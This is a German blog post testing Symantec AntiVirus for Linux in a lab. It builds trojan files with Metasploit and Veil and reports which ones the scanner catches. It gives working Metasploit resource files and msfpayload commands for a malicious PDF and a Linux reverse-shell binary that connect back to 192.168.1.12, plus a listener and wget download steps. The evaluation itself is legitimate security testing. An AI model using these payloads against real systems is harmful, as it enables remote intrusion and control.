Symantec Antivirus für Linux testen

In den ersten beiden Teilen habe ich gezeigt, wie man Symantec AntiVirus für Linux auf einem Ubuntu-Server installieren und aktualisieren kann.

Im dritten und letzten Teil wollen wir nun den Virenschutz auf dem Ubuntu-Server testen. Dazu erstellen wir uns drei Dateien, die „Trojanische Pferde“ enthalten.  Dabei werden zwei Dateien (trojan.pdf und trojan.bin) mit dem Metasploit-Framework und eine (trojan.exe) mittels des Veil-Frameworks angelegt.

Da der Virenschutz mit „Auto-Protect“ Funktion versehen ist, sollte im Idealfall keine Datei auf das Zielsystem gelangen und sofort eliminiert werden.

Zunächst prüfen wir mit folgenden Befehlen, ob Symantec Antivirus tatsächlich im „AutoProtect“ Modus arbeitet und welche Virendefinitionen installiert sind:

root@ubuntu12044:/home/frank# sav info -a
enabled
root@ubuntu12044:/home/frank# sav info -d
02/15/2014 rev. 7
									

Wir sehen, dass „AutoProtect“ eingeschaltet und der Virenschutz aktuell ist.

 

PDF-Datei als „Trojanischem Pferd“ erstellen

Als Beispiel werden wir wieder die im Buch (Seite 154-157) beschriebene Methode nutzen. Die entsprechende Ressource-Datei speichern wir als /home/fileformat.rc ab:

use windows/fileformat/adobe_utilprintf
set FILENAME trojan.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.12
set LPORT 80
exploit 
cp /root/.msf4/local/trojan.pdf /var/www/
									

Die PDF-Datei wird dann mit den folgenden Befehlen erzeugt und in das Verzeichnis /var/www/ kopiert:

msfconsole –r /home/fileformat.rc
									

 

EXE-Datei mit dem Veil-Framework erstellen

In diesem Blog gibt es nun schon mehrere Beiträge zum Veil-Framework. Hier wurden u.a. zwei Dateien mit Veil erstellt und in das Verzeichnis  /root/veil-output/compiled/  abgelegt. Auch das dazugehörige Video sollte man sich anschauen.  Diesem Beispiel folgend erstellen wir nun die Datei trojan.exe und speichern sie ebenfalls im Verzeichnis /var/www/ ab.

 

BIN-Datei erstellen

Im Buch (Seite 161) bin ich auf die Erstellung eine ausführbaren Datei unter Linux mittels msfpayload eingegangen. Diese Methode werden wir auch hier nutzen. Mit dem folgenden Befehl erstellen wir die Datei trojan.bin und speichern sie im Verzeichnis /var/www/ ab. Sie enthält ein x64 Reverse-Shell.

msfpayload linux/x64/shell/reverse_tcp LHOST=192.168.1.12 LPORT=4444 x > /var/www/trojan.bin
									

Sobald die Datei auf dem Zielsystem, in unserem Fall auf dem Ubuntu-Server, ausgeführt wird, stellt sie eine rückwärtige (reverse) Verbindung zum Angreifer her.  Dabei wird die IP-Adresse 192.168.1.12 und der Port  4444 genutzt. Um die eingehenden Datenpakete empfangen zu können, muss auf dem Angriffssystem noch ein Listener gestartet werden. Dazu erstellen wir uns folgende Ressource-Datei und speichern sie im home-Verzeichnis als multihandler_port4444.rc ab.

use multi/handler
set PAYLOAD linux/x64/shell/reverse_tcp
set LHOST 192.168.1.12
set LPORT 4444
run
									

 

Dateien mit Symantec Virenschutz für Linux prüfen

Da nun alle Dateien  im Verzeichnis /var/www/ abgelegt sind, müssen wir nur noch eine Methode auswählen, die diese an den Linux-Server ausliefert.  In aktuellen Fall stellen wir sie einfach auf einem Webserver bereit um sie dann mit dem Befehl wget von dort herunterzuladen. Als Webserver nutzen wir Kali-Linux mit der IP-Adresse 192.168.1.12. Dazu starten wir nun Apache mit Applications – Kali Linux – System Service – HTTP – apache2 start.

Auf dem Ubuntu-Server nutzen wir folgende Befehle um die bereitgestellten Dateien herunterzuladen:

cd /home/frank
wget http://192.168.1.12/trojan.exe
wget http://192.168.1.12/trojan.bin
wget http://192.168.1.12/trojan.pdf

									

Da „AutoProtect“ eingeschaltet ist, sollten die Dateien sofort auf Schadsoftware geprüft und bei positivem Ergebnis nicht ausgeliefert, sondern in Quarantäne gestellt werden.  Leider konnte Symantec Antivirus die exe-Datei und die bin-Datei nicht als Trojanisches Pferd entlarven. Die pdf-Datei dagegen wurde nicht in das home-Verzeichnis übernommen. Scheinbar wurde sie als Schadsoftware erkannt. Mit dem folgenden Befehlen können wir nun den „Quarantänefall“ prüfen:

# listet alle Dateien in Quarantäne auf
sav quarantine –l

# zeigt detailierte Informationen über einen entsprechenden Fall <ID> an
sav quarantine –i <ID>

# löscht die entsprechende Datei
sav quarantine –d <ID>
									

Weitere Kommandos kann man im Symantec AntiVirus for Linux 1.0.14 Implementation Guide einsehen.

Zum Abschluss wollen wir noch prüfen, ob mittels der bin-Datei wirklich eine Verbindung zum Angreifer hergestellt werden kann oder dies möglicherweise vom Virenschutz verhindert wird. Das nachfolgende Video zeigt, dass der Angriff geglückt ist und  eine Reverse-Shell-Verbindung hergestellt werden konnte. Scheinbar ist der installierte Virenschutz nicht in der Lage, Verbindungen zu analysieren.

 

 Fazit

Mit Antivirus für Linux stellt Symantec eine Lösung zur Verfügung, die Bedrohungen erkennen und eliminieren kann. Die „AutoProtect“ Funktion konnte bekannte Schadsoftware abwehren. Die Software stößt an ihre Grenzen, wenn unbekannte Schadsoftware eingeschleust und ausgeführt wird. Eine Art „Netzwerkbedrohungsschutz“ die Verbindungen analysiert, ist scheinbar nicht vorhanden.

 

Diese Seite verwendet Cookies, um die Nutzerfreundlichkeit zu verbessern. Mit der weiteren Verwendung stimmst du dem zu.

Datenschutzerklärung